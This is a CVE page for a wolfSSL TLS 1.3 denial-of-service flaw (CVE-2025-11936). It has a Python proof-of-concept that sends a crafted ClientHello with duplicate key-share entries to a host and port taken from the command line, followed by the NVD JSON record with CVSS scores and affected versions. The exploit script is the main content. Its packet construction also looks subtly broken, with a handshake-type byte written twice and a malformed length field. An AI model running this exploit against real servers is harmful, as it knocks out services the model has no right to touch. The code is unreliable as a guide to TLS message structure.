CVE-2025-11936

import socket import ssl import struct def create_malicious_client_hello(): """ PoC for CVE-2025-11936: wolfSSL TLS 1.3 KeyShareEntry DoS Creates a ClientHello with duplicate KeyShareEntry values """ # TLS 1.3 ClientHello with duplicate KeyShareEntry client_hello = bytearray() # TLS Record Header (Content Type: Handshake) client_hello.extend([0x16, 0x03, 0x01]) # Handshake type: ClientHello (1) client_hello.append(0x01) # We will construct the handshake message body handshake_body = bytearray() # Version: TLS 1.2 (for compatibility) handshake_body.extend([0x03, 0x03]) # Random (32 bytes) handshake_body.extend([0x00] * 32) # Session ID length handshake_body.extend([0x00]) # Cipher Suites (2 bytes length + suites) cipher_suites = bytearray([ 0x13, 0x01, # TLS_AES_128_GCM_SHA256 0x13, 0x02 # TLS_AES_256_GCM_SHA384 ]) handshake_body.extend(struct.pack('>H', len(cipher_suites))) handshake_body.extend(cipher_suites) # Compression methods handshake_body.extend([0x01, 0x00]) # Extensions extensions = bytearray() # Extension: supported_versions (0x002b) supported_versions_ext = bytearray([ 0x00, 0x2b, # Extension type ]) version_data = bytearray([ 0x00, 0x02, # Length 0x03, 0x04 # TLS 1.3 ]) supported_versions_ext.extend(struct.pack('>H', len(version_data))) supported_versions_ext.extend(version_data) extensions.extend(supported_versions_ext) # Extension: key_share (0x0033) - with DUPLICATE entries key_share_ext = bytearray([ 0x00, 0x33, # Extension type ]) # KeyShareEntry 1 - x25519 (0x001d) key_share_entry1 = bytearray([ 0x00, 0x1d, # Supported group: x25519 0x00, 0x20, # Key exchange length: 32 bytes ]) key_share_entry1.extend([0x41] * 32) # Fake key material # KeyShareEntry 2 - DUPLICATE x25519 (same group!) key_share_entry2 = bytearray([ 0x00, 0x1d, # Supported group: x25519 (DUPLICATE!) 0x00, 0x20, # Key exchange length: 32 bytes ]) key_share_entry2.extend([0x42] * 32) # Different fake key material key_share_data = key_share_entry1 + key_share_entry2 key_share_ext.extend(struct.pack('>H', len(key_share_data))) key_share_ext.extend(key_share_data) extensions.extend(key_share_ext) # Extension length extensions_length = struct.pack('>H', len(extensions)) # Handshake body handshake_body.extend(extensions_length) handshake_body.extend(extensions) # Handshake length handshake_length = struct.pack('>I', len(handshake_body))[1:] client_hello.extend([0x01]) # Handshake type: ClientHello client_hello.extend(handshake_length) client_hello.extend(handshake_body) # Update record length record_length = struct.pack('>H', len(client_hello) - 5) client_hello[3:5] = record_length return bytes(client_hello) def exploit(target_host, target_port=443): """ Send malicious ClientHello to trigger DoS """ print(f"[*] Sending malicious ClientHello to {target_host}:{target_port}") try: context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((target_host, target_port), timeout=10) as sock: with context.wrap_socket(sock, server_hostname=target_host) as ssock: # This will fail, but we sent the malicious ClientHello pass except Exception as e: print(f"[*] Connection result: {type(e).__name__}") malicious_hello = create_malicious_client_hello() try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) sock.send(malicious_hello) print("[+] Malicious ClientHello sent successfully") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) > 1: exploit(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443) else: print("Usage: python cve_2025_11936_poc.py <target_host> [port]")

{"cve": {"id": "CVE-2025-11936", "sourceIdentifier": "[email protected]", "published": "2025-11-21T23:15:44.710", "lastModified": "2025-12-03T18:47:25.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation in the TLS 1.3 KeyShareEntry parsing in wolfSSL v5.8.2 on multiple platforms allows a remote unauthenticated attacker to cause a denial-of-service by sending a crafted ClientHello message containing duplicate KeyShareEntry values for the same supported group, leading to excessive CPU and memory consumption during ClientHello processing."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.8.2", "versionEndExcluding": "5.8.4", "matchCriteriaId": "EB81B784-14DD-4CD0-859A-62D42ADDD7D3"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/wolfSSL/wolfssl/pull/9117", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/wolfSSL/wolfssl/pull/9117", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Issue Tracking", "Patch"]}]}}